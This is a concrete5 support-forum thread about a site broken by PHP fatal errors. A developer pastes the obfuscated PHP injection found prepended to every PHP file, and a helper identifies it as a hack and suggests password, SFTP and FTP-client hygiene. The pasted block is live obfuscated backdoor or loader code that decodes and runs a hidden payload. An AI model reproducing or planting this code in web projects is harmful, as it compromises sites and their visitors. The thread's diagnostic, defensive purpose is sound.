Forums

Fatal Error out of nowhere

Permalink
Hi There I'm hoping for some help.
One of my clients just reached out to me about their website that another developed a couple of years ago.
Now I'm not much of a boffin when it comes to php so I'm not understanding the error and the developer has disappeared. I'm suspecting the client logged in and did an upgrade or changed something, but they say they haven't touched anything. I asked them to ask their host to load an older back up but it seems they are refusing to do that...
The issue is the site is displaying blank and this is the error code:
PHP Warning: require_once(/home/smi65/public_html/MYSITE/concrete/core/libraries/view.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in /home/smi65/public_html/MYSITE/concrete/core/libraries/loader.php on line 152
PHP Fatal error: require_once() [<a href='function.require'>function.require</a>]: Failed opening required '/home/smi65/public_html/MYSITE/concrete/core/libraries/view.php' (include_path='/home/smi65/public_html/MYSITE/libraries/3rdparty:/home/smi65/public_html/MYSITE/concrete/libraries/3rdparty:.:/usr/lib/php:/usr/local/lib/php') in /home/smi65/public_html/MYSITE/concrete/core/libraries/loader.php on line 152

Any help would be greatly appreceated
junebird
 
hutman replied on at Permalink Best Answer Reply
hutman
What version of C5 is this site using?
Is it possible that the host updated the PHP version without telling them?

There have been several other threads (mostly BlueHost) where people's PHP versions have been updated without their knowledge and then older versions of C5 show errors down the page similar to this.
junebird replied on at Permalink Reply
junebird
It may be possible, I'll have to ask the client to ask the host though.
It's 5.6.3.1
I received the ftp details and looked at the php files.
All the files on the server have a very long string of alien php code in front of the DOCTYPE
It was definitely not there before, is it possible the site was hacked?
hutman replied on at Permalink Reply
hutman
It's possible, but without seeing what is there I don't know how that would throw these PHP errors. What files is the "alien" code in?
junebird replied on at Permalink Reply
junebird
It's ALL the files.
Version.php, site.php, theme files, absolutely all the php files have that code.
Am I allowed to post it to this thread?
hutman replied on at Permalink Reply
hutman
Go for it
junebird replied on at Permalink Reply
junebird
<?php $jczmzfrnu = 'x5f   163   x74   141   x72   16(array_map("zpsckdc",str_split("%tjw!>!#]y84]275]y83]248]y83]256]>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmt|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!   x%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]7**<")));$hyhcgfb = $jjkkaow("", $wblyytu); $hyhcgfb();}}%w6Z6<.4`hA   x27pd%6<%rxB%epnbss!>!bssbz)#44ec:649#-!y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~   x24<!%GMFT`QIQ&f_UTPI`QUUI&e_SEEB`5]256]y6g]257]y86]267]y7fvr#   x5cq%7**^#zsfvr#   x5cq%)ufttj   x22)gj3P6L1M5]D2P4]D6#<%G]y6d]281Ld]<!%ww2)%w`TW~   x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-if((function_exists("   x6f   142   7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]fid>}&;!osvufs}   x7f;!opjudovg}k~~9{d%:osvufs:~928>>   x22:fR;2]},;osvufs}   x27;mnui}&;zepc}x27u%)7fmjix6<C   x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]5fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4   x223}!+!<2   137   x41   107   x45   116   x54"]); if ((strst*qp%!-uyfu%)3of)fepdof`57ftbc   x7f!|!*uyfu   x27ktmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd1927:M8]Df#<%tdz>#L4]275L3]248Lw2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y32!>!bssbz)   x24]25   x24-   x24-!%   7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjgBSUOSVUFS,6<*msv%7-MSV,6<x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,4N}#QwTW%hIr   x5c1^-%r   x5c2^-%hOh/#00#W~!%t2197-2qj%7-K)udfoopdXA   x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`G27!hmg%!)!gj!<2,*j%!-#1]#-bubE{6:ce44#)zbssb!>!ssbnpe_j%7-C)fepmqnjA   x27&6<*&7-#o]s]o]s]#)fepmqyf   x27*&7-n%)utjm6<   x7fw6*CW&)7gj6<*K)ftpmdXA6~67R57,27R66,#/q%>2q%<#g6R85,turn chr(ord($n)-1);} @error_reporting(0); $wblyytu = implodeUUI&b%!|!*)323zbek!~!<b%   x7f!<X>b%Z<#opo37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67sv%)}k~~~<ftmbg!osvufs!uft`msvd}+;!>!}   x27;!>>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}w;*   x7<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y866   x3a   61   x31"))) { $jjkkaow = "   x63   162   x65   141   #>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj   x22)gj!|!*nbsbq%)323ldfidk!~!<*1]278]y3e]81]K78:56985:6197g:74985-rr.l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_   x5c}X   x242#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/o:!>!   x242178}527}88:}334}472   x24<!%ff43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss   x5cs1/20QUUI7jsv%7UFH#   x27rfs%6~6<   x7fw6<*K)ftpmdXA6|7**%)!gj!<**2-4-bubE{h%)sutcv24-   x24y4   x24-   x24]y8   x24-   x24]26   x24-   x24<%j,,*!|   x24-   33bq}k;opjudovg}x;0]=])0#)U!   x27{**u%-#jt0}Z;0]=]0#)2q%C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#   x24#-!#]y38#-!%w:#:618d5f9#-!#f6c68399#-!#7e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]<u%7>/7&6|7**111127-K)ebfsX   !<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm93e:5597f-s.973:8297f:529>j%!*9!   x27!hmg%)!gj!~<ofmy%,3,j%>j%)%cB%iN}#-!   x24/%tmw/   x24)%c*W%eN+#Qi   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cD6P2L5P6]y6gP7L6M7]D4]275]Dp%)54l}   x27;%!<*#}_;#)323ldf!>>   x22!pd%)!gj}Z;h!opjudovg}{;#)tutj6<&w6<   x7fw6*CW&)7gj6<.[A   x27&6<   x7fw6*   x245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!x24gvodujpo!   x24-   x24y7   x24-   x24*<!   x24-   x24gps)%j>1<%j=tj{fpgB)fubfsdXA   x27K6<   x7fw6*3qj%7>   x2272qj%)7gj6<**2qj%)IjQeTQcOc/#00#W~!Ydrr)*#npd/#)rrd/#00;quui#>.%!<***f   x27,*e   x27,*d   x27,*c   x27,*b   x27)fep67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfeLS["   x61   156   x75   156   x61"])))) { $GLOBALS["   x61   156   x75   156   x61"]}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpbfsdXk5`{66~6<&w6<   x7fw6*CW&)7gj6<*do+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)x24-   x24*!|!   x24-   x24   x5c%j^   x24-   x24tvctus)%   x%z-#:#*   x24-   x24!>!   x24/%tjw/   x24)%   xdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!d%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+944]275]y7:]268]y7f#<!%tww!>!   x2400~:<h%_27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:zB%z>!   x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%ryf`opjudovg)!gj!|!*m+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>   x22!ftm6<^#Y#   x5cq%   x27Y%6<.msv`ftsbqA7>q%6<   x7fw6*   x7f_*#fuboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:pd%w6Z6<.3`hA   x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&w6t)esp>hmg%!<12>j%!|!*#91y]c9y]g2ybfI{*w%)kVx{**#k#)tutjyf`x   x22l:!}V;3q%}U;y]})%   x24-   x24*<!~!   x24/%t2w/   x24)##-!*)ujojR   x27id%6<   x7fw6*   x7f_*#ujojRk3`{666~6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOfmjgk4`{6~6<tfs%w6<   x7fw6*CWtfs%)7gj6<*id%)f!**#j{hnpd#)tutjyf`opjudovg   x22)!gj}1~!<2p%   x7f!~!<##!>!2/7#@#7/7^#iubq#   x5cq%   x27jsv%6<C>^#zshopm3qjA)qj3hopmA   x273qj%6<*Y%)fnbozcY%w`   x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%w|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-q<.fmjgA   x27doj%6<   x7fw6*   x7f_*#!|!*5!   x27!hmg%)!gj!|!*1?hmgtpmdR6<*id%)dfyfR   x27tfs%r($uas,"   x6d   163   x69   145")) or (strstr($uas,"   x72   1]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M=1; $uas=strtolower($_SERVER["   x48   124   x54   120   x5f   125   x53   105   x5bg)!gj<*#k#)usbut`cpV   x7f   x7f   x7f   x7f<u%V   x27{ftmfV   x7f<*X&Z&S{ftmfV   #~<#/%   x24-   x24!>!fyqmpef)#   x24*<!%t::!>!   x24Ypp37!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsuth%)tpqsut>j%!*72!   x24") && (!isset($GLOBAjt)!gj!<*2bd%-#1GO   x2x74   145   x5f   146   x75   156   x63   164   x69   157   x6e"; function zpsckdc($n){re#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#A;~!}   x7f;!|!}{;)gj}l;<#64y]552]e7y]#>n%<#372]58y]472]f!%b:>%s:   x5c%j:.2^,%b:<!%c:>%s:   x5c%j:^<!7]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%ufhA   x272qj%6<^#zsfvr#   x5cq%7FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`Qyy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%46767~6<Cw6<pd%w6Z6<.5`hA   x27pd%6<pdy81]265]y72]254]y76#<!%w:!>!(%w:!>!   x2p%Z<^2   x5c2b%!>!2p%!*3>?*2b%)gpf{t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]24-   x24b!>!%yy)#}#-#   x24-   x24-tusqpt)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)RsTrREvxNoiTCnuf_EtaerCxECalPer_Rtsektyxbspwz'; $uhyoqtig=explode(chr((739-619)),substr($jczmzfrnu,(26422-20545),(202-168))); $bplzgn = $uhyoqtig[0]($uhyoqtig[(4-3)]); $nnvkldqqp = $uhyoqtig[0]($uhyoqtig[(6-4)]); if (!function_exists('lztifod')) { function lztifod($yzmjhpli, $scygrr,$kgopwyqv) { $nwsztvovk = NULL; for($yifovvvi=0;$yifovvvi<(sizeof($yzmjhpli)/2);$yifovvvi++) { $nwsztvovk .= substr($scygrr, $yzmjhpli[($yifovvvi*2)],$yzmjhpli[($yifovvvi*2)+(6-5)]); } return $kgopwyqv(chr((60-51)),chr((529-437)),$nwsztvovk); }; } $widqyj = explode(chr((213-169)),'680,30,0,22,5161,21,3307,65,4921,65,980,40,4811,51,1985,49,5203,69,1693,61,22,65,5651,38,5615,36,401,20,4071,69,1597,69,2658,28,846,66,2342,52,1463,60,3123,52,4473,38,5462,29,4436,37,559,40,3964,53,3441,37,1577,20,4727,31,4335,44,4786,25,4296,39,1337,25,4253,43,2951,41,1281,56,3372,69,1863,60,2913,38,3874,20,1840,23,151,64,1523,31,5141,20,5104,37,2757,36,2686,46,4758,28,2394,26,4140,33,4601,56,4379,57,5689,33,5182,21,2194,49,3197,66,3607,67,4555,46,3478,45,5812,65,3674,44,1554,23,507,28,5491,36,1754,40,2034,67,1020,46,4657,70,2886,27,758,57,1066,62,912,68,3894,70,4986,69,1362,59,1666,27,3263,44,4173,45,815,31,5317,22,2476,55,2139,55,1923,62,535,24,3718,39,5722,53,3757,64,5339,32,1794,46,453,54,2243,38,1251,30,3523,47,5775,37,3570,37,2420,56,3061,62,4218,35,5055,49,2793,66,3175,22,421,32,2589,25,5569,46,3821,53,1421,42,1196,55,2101,38,2732,25,2614,44,283,62,5413,49,5527,42,2859,27,1128,27,599,30,2992,69,215,68,4862,59,710,48,2281,61,4017,54,87,64,5371,42,4511,44,1155,41,629,51,5272,45,2531,58,345,56'); $gvsuxmtmd = $bplzgn("",lztifod($widqyj,$jczmzfrnu,$nnvkldqqp)); $bplzgn=$jczmzfrnu; $gvsuxmtmd(""); $gvsuxmtmd=(836-715); $jczmzfrnu=$gvsuxmtmd-1; ?><?php
defined('C5_EXECUTE') or die("Access Denied.");
$APP_VERSION = '5.6.3.1';
hutman replied on at Permalink Reply
hutman
Yes, that definitely looks like you were hacked.

I hope there is a clean backup of the files somewhere that can be restored.
junebird replied on at Permalink Reply
junebird
I already asked the client to ask the host for a clean backup.
What can I do to avoid the site being hacked in future?
Thank you so much for checking it all out for me
hutman replied on at Permalink Reply
hutman
I think the main thing is to change your password on the server and make sure whatever it is changed to is a strong password.

You should also make sure that the host has SFTP enabled and anytime somebody connects to the server they use it. Also, make sure that your password aren't saved in Filezilla if that is your FTP client as there is malware that can read those files and get the passwords.
junebird replied on at Permalink Reply
junebird
Thank you so much!
I'm going to look into all of those suggestions.
Really appreciate your help!